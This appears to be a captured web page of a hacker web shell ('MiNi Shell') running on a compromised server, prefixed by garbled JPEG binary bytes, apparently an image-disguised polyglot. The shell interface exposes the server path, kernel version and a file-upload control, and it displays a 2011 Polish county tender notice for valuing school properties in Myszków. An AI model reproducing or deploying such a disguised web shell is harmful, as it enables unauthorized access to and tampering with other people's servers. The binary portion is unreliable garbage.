JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111109/372398-N-2011.html

<p class="kh_header"><b>Myszków: Wykonanie operatów szacunkowych</b><br>
<b>Numer ogłoszenia: 372398 - 2011; data zamieszczenia: 09.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Myszkowski reprezentowany przez Zarząd Powiatu w Myszkowie , ul. Pułaskiego 6, 42-300 Myszków, woj. śląskie, tel. 034 3159100, faks 034 3159160.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatmyszkowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie operatów szacunkowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie Nr 1
Przedmiotem zamówienia jest wykonanie operatów szacunkowych określających wartość rynkową nieruchomości szkolnych położonych w: 
1.Myszkowie przy ul. 11 Listopada 9 ( obręb Myszków ) zabudowanej budynkiem Liceum Ogólnokształcącego im. mjr. H. Sucharskiego w Myszkowie wraz z segmentem ABC o pow. użytkowej 2 359,9 m2 i kubaturze 15 253,9 m3 ozn. w ewidencji gruntów jako działki ozn. nr 6077/7, 6078/3, 6079/3, 6080/3, 6081/3, 6082/3, 6083/3, 6084/8, 6085/13, 6090/5, 6092/5 o łącznej pow. 0,7932 ha, stanowiącej własność Powiatu Myszkowskiego,
2.Myszkowie przy ul. 11 Listopada 9 ( obręb Myszków ), na której znajdują się schody wejściowe do budynku Liceum Ogólnokształcącego im. mjr. H. Sucharskiego w Myszkowie ozn. w ewidencji gruntów jako działka ozn. nr 6089/3 o pow. 0,0280 ha, stanowiącej własność Skarbu Państwa w użytkowaniu wieczystym Powiatu Myszkowskiego,
3.Myszkowie przy ul. Kwiatkowskiego 18 ( obręb Myszków ) zabudowanej budynkiem Zespołu Szkół Nr 1 im. E. Kwiatkowskiego w Myszkowie o pow. użytkowej 3 302,5 m2 i kubaturze 10 568,6 m3 ozn. w ewidencji gruntów jako działki nr 3740/2, 3741/2, 3742/2, 3743/2, 3744/2, 3745/2, 3746/2, 3747/4, 3747/6, 3748/2, 3749/2, 3750/2, 3751/2, 3752/2 o łącznej pow. 2,0644 ha, stanowiącej własność Powiatu Myszkowskiego,
4.Myszkowie przy ul. Pułaskiego 70 ( obręb Będusz ) zabudowanej budynkiem Zespołu Szkół Nr 2 im. H. Kołłątaja w Myszkowie o pow. użytkowej 2 394 m2 i kubaturze 13 372 m3, halą garażową o pow. użytkowej 142 m2 i kubaturze 710 m3, garażami murowanymi o pow. użytkowej 165 m2 i kubaturze 577 m3, ozn. w ewidencji gruntów jako działki nr 2/4, 2/11, 2/12, 2/22 o łącznej pow. 7,3951 ha, stanowiącej własność Powiatu Myszkowskiego,
5.Żarkach przy ul. Myszkowskiej 50 ( obręb Żarki ) zabudowanej budynkiem Zespołu Szkół im. T. Kościuszki w Żarkach wraz z domem nauczyciela o pow. użytkowej 3 395,7 m2 i kubaturze 18 800 m3 oraz salą gimnastyczną o pow. użytkowej 757,9 m2 i kubaturze 5 046,8 m3 ozn. w ewidencji gruntów jako działka nr 2480 o pow. 2,4824 ha, stanowiącej własność Powiatu Myszkowskiego.
dla potrzeb ustalenia ceny nieruchomości w celu oddania nieruchomości w trwały zarząd jednostkom organizacyjnym Powiatu Myszkowskiego. W określonej wartości nieruchomości należy wyodrębnić wartość gruntu. Zamawiający informuje, że podana powierzchnia użytkowa oraz kubatura określone zostały według stanu z lat 1999 - 2000. Ponadto Zamawiający informuje, że u dyrektorów szkół znajduje się dokumentacja techniczna budynków. Termin oględzin nieruchomości należy uzgodnić z dyrektorami szkół. Dla każdej nieruchomości należy sporządzić odrębnie operat w 2 egzemplarzach.
Zadanie Nr 2
Przedmiotem zamówienia jest wykonanie operatu szacunkowego określającego wartość rynkową nieruchomości położonej w Myszkowie przy ul. Pułaskiego 6, zabudowanej budynkiem biurowym o pow. użytkowej 2 843 m2, kubaturze 11 220 m2, ozn. jako działka nr 3284/45  o pow. 2878 m2, stanowiącej własność Powiatu Myszkowskiego  oraz  wartości udziału w ww. nieruchomości podlegający przekazaniu w trwały zarząd na rzecz Zespół Obsługi Ekonomiczno - Administracyjnej Szkół i Placówek Oświatowo - Wychowawczych obejmującej lokal znajdujący się na V piętrze, składający się z sześciu pomieszczeń biurowych  o pow. ok. 105,3 m2,  jednego pomieszczenia WC oraz części wspólnych niezbędnych do korzystania z lokalu. Zamawiający dysponuje częściową dokumentacją techniczną budynku i rzutami kondygnacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.30.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W przedmiotowym postępowaniu Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeżeli Wykonawca wykaże, iż posiada osoby zdolne do wykonania zamówienia, to jest załączy do oferty wykaz osób (załącznik nr 4 do SIWZ), które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami. Z wykazu musi wynikać, że Wykonawca dysponuje dla realizacji przedmiotu zamówienia osobami, z których co najmniej jedna posiada uprawnienia rzeczoznawcy majątkowego. Do wykazu należy dołączyć oświadczenie (załącznik nr 5 do SIWZ), że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, czyli: oświadczenie o posiadaniu uprawnień rzeczoznawcy majątkowego, przez osoby, które będą uczestniczyć w wykonywaniu zamówienia - co najmniej 1 osoba.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli wykonawcy wspólnie ubiegają się o zamówienie (konsorcjum) mają obowiązek złożyć każdy z osobna dokumenty wymienione w Rozdziale VII ppkt 1.1, ppkt 2.1, ppkt 2.2, ppkt 2.3, ppkt 2.4 SIWZ. Dokumenty wymienione w Rozdziale VII ppkt. 1.2, ppkt 1.3 SIWZ powinny potwierdzać spełnianie warunków udziału w postępowaniu wspólnie przez Wykonawców składających ofertę, lub powinien je spełniać dowolny Wykonawca spośród Wykonawców składających wspólną ofertę. 
Do ofert należy dołączyć:
a)Pełnomocnictwo ustanawiające pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu  i zawarcia umowy w sprawie zamówienia publicznego,
b)W przypadku złożenia oferty przez spółkę cywilną do oferty należy dołączyć odpowiednie pełnomocnictwo(a) udzielone przez wszystkich wspólników dla jednego ze wspólników lub dla osoby trzeciej, upoważniające osobę umocowaną do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Jeżeli upoważnienie do złożenia oferty wspólnej wynika  np. z umowy spółki cywilnej, to do oferty zamiast pełnomocnictwa można załączyć tę umowę (oryginał) lub jej kopię poświadczoną notarialnie za zgodność z oryginałem lub jej kopię poświadczoną za zgodność z oryginałem przez wszystkich wspólników. 
Dokumenty, o których mowa w rozdziale VII ppkt 2.2 SIWZ powinny być wystawione na każdego ze wspólników spółki z osobna, natomiast dokumenty z ppkt 2.3 i ppkt 2.4 rozdziału VII SIWZ na każdego ze wspólników spółki cywilnej i na spółkę cywilną. Oświadczenie o spełnieniu warunków udziału w postępowaniu (załącznik nr 1 do SIWZ) oraz oświadczenie o braku podstaw do wykluczenia z postępowania (załącznik nr 2 do SIWZ) ma obowiązek złożyć każdy ze wspólników spółki cywilnej. 
W przypadku wyboru przez zamawiającego oferty złożonej przez konsorcjum, wykonawcy tworzący konsorcjum zobowiązani będą najpóźniej przed zawarciem umowy w sprawie zamówienia publicznego, do przedłożenia umowy konsorcjum.
Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem konsorcjum.
4. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w Rozdziale VII ppkt 2.2. ppkt 2.3, ppkt 2.4, SIWZ składa dokumenty o których mowa w § 4 Rozporządzenia Prezesa Rady Ministrów  z dnia 30 grudnia 2009 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane. ( Dz. U. Nr 226, poz. 1817)
 W/w dokumenty  należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu w przypadku, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna  lub budzi wątpliwości co do jej prawdziwości.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy(ów), w przypadku wystąpienia okoliczności wymienionej poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
-Zamawiający przewiduje zmianę treści umowy w przypadku zmiany przepisów powszechnie obowiązującego prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.powiatmyszkowski.bip.net.pl/?c=207<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Myszkowie, ul. Pułaskiego 6, 42-300 Myszków, pokój nr 308.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.11.2011 godzina 10:00, miejsce: Starostwo Powiatowe w Myszkowie, 42 - 300 Myszków, ul. Pułaskiego 6, Biuro Podawcze na Sali Obsługi Interesantów (parter) stanowisko nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie operatów szacunkowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 1
Przedmiotem zamówienia jest wykonanie operatów szacunkowych określających wartość rynkową nieruchomości szkolnych położonych w: 
1.Myszkowie przy ul. 11 Listopada 9 ( obręb Myszków ) zabudowanej budynkiem Liceum Ogólnokształcącego im. mjr. H. Sucharskiego w Myszkowie wraz z segmentem ABC o pow. użytkowej 2 359,9 m2 i kubaturze 15 253,9 m3 ozn. w ewidencji gruntów jako działki ozn. nr 6077/7, 6078/3, 6079/3, 6080/3, 6081/3, 6082/3, 6083/3, 6084/8, 6085/13, 6090/5, 6092/5 o łącznej pow. 0,7932 ha, stanowiącej własność Powiatu Myszkowskiego,
2.Myszkowie przy ul. 11 Listopada 9 ( obręb Myszków ), na której znajdują się schody wejściowe do budynku Liceum Ogólnokształcącego im. mjr. H. Sucharskiego w Myszkowie ozn. w ewidencji gruntów jako działka ozn. nr 6089/3 o pow. 0,0280 ha, stanowiącej własność Skarbu Państwa w użytkowaniu wieczystym Powiatu Myszkowskiego,
3.Myszkowie przy ul. Kwiatkowskiego 18 ( obręb Myszków ) zabudowanej budynkiem Zespołu Szkół Nr 1 im. E. Kwiatkowskiego w Myszkowie o pow. użytkowej 3 302,5 m2 i kubaturze 10 568,6 m3 ozn. w ewidencji gruntów jako działki nr 3740/2, 3741/2, 3742/2, 3743/2, 3744/2, 3745/2, 3746/2, 3747/4, 3747/6, 3748/2, 3749/2, 3750/2, 3751/2, 3752/2 o łącznej pow. 2,0644 ha, stanowiącej własność Powiatu Myszkowskiego,
4.Myszkowie przy ul. Pułaskiego 70 ( obręb Będusz ) zabudowanej budynkiem Zespołu Szkół Nr 2 im. H. Kołłątaja w Myszkowie o pow. użytkowej 2 394 m2 i kubaturze 13 372 m3, halą garażową o pow. użytkowej 142 m2 i kubaturze 710 m3, garażami murowanymi o pow. użytkowej 165 m2 i kubaturze 577 m3, ozn. w ewidencji gruntów jako działki nr 2/4, 2/11, 2/12, 2/22 o łącznej pow. 7,3951 ha, stanowiącej własność Powiatu Myszkowskiego,
5.Żarkach przy ul. Myszkowskiej 50 ( obręb Żarki ) zabudowanej budynkiem Zespołu Szkół im. T. Kościuszki w Żarkach wraz z domem nauczyciela o pow. użytkowej 3 395,7 m2 i kubaturze 18 800 m3 oraz salą gimnastyczną o pow. użytkowej 757,9 m2 i kubaturze 5 046,8 m3 ozn. w ewidencji gruntów jako działka nr 2480 o pow. 2,4824 ha, stanowiącej własność Powiatu Myszkowskiego.
dla potrzeb ustalenia ceny nieruchomości w celu oddania nieruchomości w trwały zarząd jednostkom organizacyjnym Powiatu Myszkowskiego. W określonej wartości nieruchomości należy wyodrębnić wartość gruntu. Zamawiający informuje, że podana powierzchnia użytkowa oraz kubatura określone zostały według stanu z lat 1999 - 2000. Ponadto Zamawiający informuje, że u dyrektorów szkół znajduje się dokumentacja techniczna budynków. Termin oględzin nieruchomości należy uzgodnić z dyrektorami szkół. Dla każdej nieruchomości należy sporządzić odrębnie operat w 2 egzemplarzach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.30.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie operatów szacunkowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 2
Przedmiotem zamówienia jest wykonanie operatu szacunkowego określającego wartość rynkową nieruchomości położonej w Myszkowie przy ul. Pułaskiego 6, zabudowanej budynkiem biurowym o pow. użytkowej 2 843 m2, kubaturze 11 220 m2, ozn. jako działka nr 3284/45  o pow. 2878 m2, stanowiącej własność Powiatu Myszkowskiego  oraz  wartości udziału w ww. nieruchomości podlegający przekazaniu w trwały zarząd na rzecz Zespół Obsługi Ekonomiczno - Administracyjnej Szkół i Placówek Oświatowo - Wychowawczych obejmującej lokal znajdujący się na V piętrze, składający się z sześciu pomieszczeń biurowych  o pow. ok. 105,3 m2,  jednego pomieszczenia WC oraz części wspólnych niezbędnych do korzystania z lokalu. Zamawiający dysponuje częściową dokumentacją techniczną budynku i rzutami kondygnacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.30.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com